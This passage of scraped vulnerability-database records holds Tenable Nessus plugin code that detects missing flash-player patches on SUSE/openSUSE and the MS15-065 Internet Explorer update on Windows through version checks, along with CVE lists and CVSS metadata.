(APSA16-02)\n\nhttps://helpx.adobe.com/security/products/flash-player/apsa16-02.html\n\nSome CVEs were not listed in the last submission :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-player packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-gnome-11.2.202.621-2.97.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"flash-player-kde4-11.2.202.621-2.97.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T17:58:28", "description": "The version of Internet Explorer installed on the remote host is missing Cumulative Security Update 3076321. It is, therefore, affected by multiple vulnerabilities, the majority of which are remote code execution vulnerabilities. An attacker can exploit these vulnerabilities by convincing a user to visit a specially crafted website.\n\nHosts running Internet Explorer 10 or Internet Explorer 11 will not be fully protected until both security update 3065822 and security update 3075516 are applied to the system. Security update 3075516 may require manual installation depending on your patching method.\n\nNote that the majority of the vulnerabilities addressed by Cumulative Security Update 3076321 are mitigated by the Enhanced Security Configuration (ESC) mode which is enabled by default on Windows Server 2003, 2008, 2008 R2, 2012, and 2012 R2.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-15T00:00:00", "type": "nessus", "title": "MS15-065: Cumulative Security Update for Internet Explorer (3076321)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1729", "CVE-2015-1733", "CVE-2015-1738", "CVE-2015-1767", "CVE-2015-2372", "CVE-2015-2383", "CVE-2015-2384", "CVE-2015-2385", "CVE-2015-2388", "CVE-2015-2389", "CVE-2015-2390", "CVE-2015-2391", "CVE-2015-2397", "CVE-2015-2398", "CVE-2015-2401", "CVE-2015-2402", "CVE-2015-2403", "CVE-2015-2404", "CVE-2015-2406", "CVE-2015-2408", "CVE-2015-2410", "CVE-2015-2411", "CVE-2015-2412", "CVE-2015-2413", "CVE-2015-2414", "CVE-2015-2419", "CVE-2015-2421", "CVE-2015-2422", "CVE-2015-2425"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS15-065.NASL", "href": 
"https://www.tenable.com/plugins/nessus/84761", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84761);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2015-1729\",\n \"CVE-2015-1733\",\n \"CVE-2015-1738\",\n \"CVE-2015-1767\",\n \"CVE-2015-2372\",\n \"CVE-2015-2383\",\n \"CVE-2015-2384\",\n \"CVE-2015-2385\",\n \"CVE-2015-2388\",\n \"CVE-2015-2389\",\n \"CVE-2015-2390\",\n \"CVE-2015-2391\",\n \"CVE-2015-2397\",\n \"CVE-2015-2398\",\n \"CVE-2015-2401\",\n \"CVE-2015-2402\",\n \"CVE-2015-2403\",\n \"CVE-2015-2404\",\n \"CVE-2015-2406\",\n \"CVE-2015-2408\",\n \"CVE-2015-2410\",\n \"CVE-2015-2411\",\n \"CVE-2015-2412\",\n \"CVE-2015-2413\",\n \"CVE-2015-2414\",\n \"CVE-2015-2419\",\n \"CVE-2015-2421\",\n \"CVE-2015-2422\",\n \"CVE-2015-2425\"\n );\n script_bugtraq_id(\n 75626,\n 75631,\n 75636,\n 75677,\n 75679,\n 75687,\n 75689,\n 75690,\n 75745\n );\n script_xref(name:\"MSFT\", value:\"MS15-065\");\n script_xref(name:\"MSKB\", value:\"3065822\");\n script_xref(name:\"MSKB\", value:\"3075516\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"MS15-065: Cumulative Security Update for Internet Explorer (3076321)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web browser installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Internet Explorer installed on the remote host is\nmissing Cumulative Security Update 3076321. It is, therefore, affected\nby multiple vulnerabilities, the majority of which are remote code\nexecution vulnerabilities. 
An attacker can exploit these\nvulnerabilities by convincing a user to visit a specially crafted\nwebsite.\n\nHosts running Internet Explorer 10 or Internet Explorer 11 will not\nbe fully protected until both security update 3065822 and security\nupdate 3075516 are applied to the system. Security update 3075516\nmay require manual installation depending on your patching method.\n\nNote that the majority of the vulnerabilities addressed by Cumulative\nSecurity Update 3076321 are mitigated by the Enhanced Security\nConfiguration (ESC) mode which is enabled by default on Windows Server\n2003, 2008, 2008 R2, 2012, and 2012 R2.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-065\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Internet Explorer 6, 7, 8,\n9, 10, and 11.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2425\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS15-065';\nkb = '3065822';\nkb2 = '3075516';\n\nkbs = make_list(kb,kb2);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\n# Some of the 2k3 checks could flag XP 64, which is unsupported\nif (\"Windows XP\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nvuln = 0;\n\nif (\n #######################################\n # KB 3076321 (kb) #\n #######################################\n\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.17905\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.17412\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n 
hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.21523\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.17915\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.17412\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.21523\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16669\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20784\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18896\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.23099\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16669\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20784\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", 
version:\"8.0.6001.19652\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23707\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.19421\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23728\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23707\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21481\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5662\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n) vuln++;\n\n\n\nif (\n #######################################\n # KB 3075516 (kb2) #\n #######################################\n\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", file:\"jscript9.dll\", version:\"11.0.9600.17923\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"jscript9.dll\", version:\"10.0.9200.21531\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"jscript9.dll\", version:\"10.0.9200.17422\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n\n # 
Windows 7 / 2008 R2\n # - Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"11.0.9600.17918\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"10.0.9200.21531\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"jscript9.dll\", version:\"10.0.9200.17422\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb2)\n) vuln++;\n\nif( vuln )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:24:54", "description": "This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n\n - The following CVEs got fixed during the previous release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011, CVE-2016-1012, CVE-2016-1013, CVE-2016-1014, CVE-2016-1015, CVE-2016-1016, CVE-2016-1017, CVE-2016-1018, CVE-2016-1019, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1030, CVE-2016-1031, CVE-2016-1032, CVE-2016-1033\n\nNote that Tenable Network Security has 
extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033", "CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:flash-player", "p-cpe:/a:novell:suse_linux:flash-player-gnome", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-1305-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1305-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91217);\n script_version(\"2.16\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\",\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"SUSE SLED12 Security Update : flash-player (SUSE-SU-2016:1305-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for flash-player fixes the following issues :\n\n - Security update to 11.2.202.621 (bsc#979422) :\n\n - APSA16-02, APSB16-15, CVE-2016-1096, CVE-2016-1097,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\n CVE-2016-1104, CVE-2016-1105, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4109,\n CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\n CVE-2016-4113, CVE-2016-4114, CVE-2016-4115,\n CVE-2016-4116, 
CVE-2016-4117\n\n - The following CVEs got fixed during the previous\n release, but got published afterwards :\n\n - APSA16-01, APSB16-10, CVE-2016-1006, CVE-2016-1011,\n CVE-2016-1012, CVE-2016-1013, CVE-2016-1014,\n CVE-2016-1015, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1018, CVE-2016-1019, CVE-2016-1020,\n CVE-2016-1021, CVE-2016-1022, CVE-2016-1023,\n CVE-2016-1024, CVE-2016-1025, CVE-2016-1026,\n CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\n CVE-2016-1030, CVE-2016-1031, CVE-2016-1032,\n CVE-2016-1033\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=979422\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1006/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1011/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1013/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1014/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1015/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1016/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1017/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1018/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1019/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2016-1020/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1021/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1022/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1023/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1024/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1025/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1026/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1027/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1028/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1029/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1030/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1031/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1032/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1097/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1098/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1099/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.suse.com/security/cve/CVE-2016-1100/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1101/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1102/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1103/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1104/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1105/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1106/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1107/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-1110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4108/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4109/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4110/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4111/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4112/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4113/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4114/\");\n script_set_attribute(attribute:\"see_also\", 
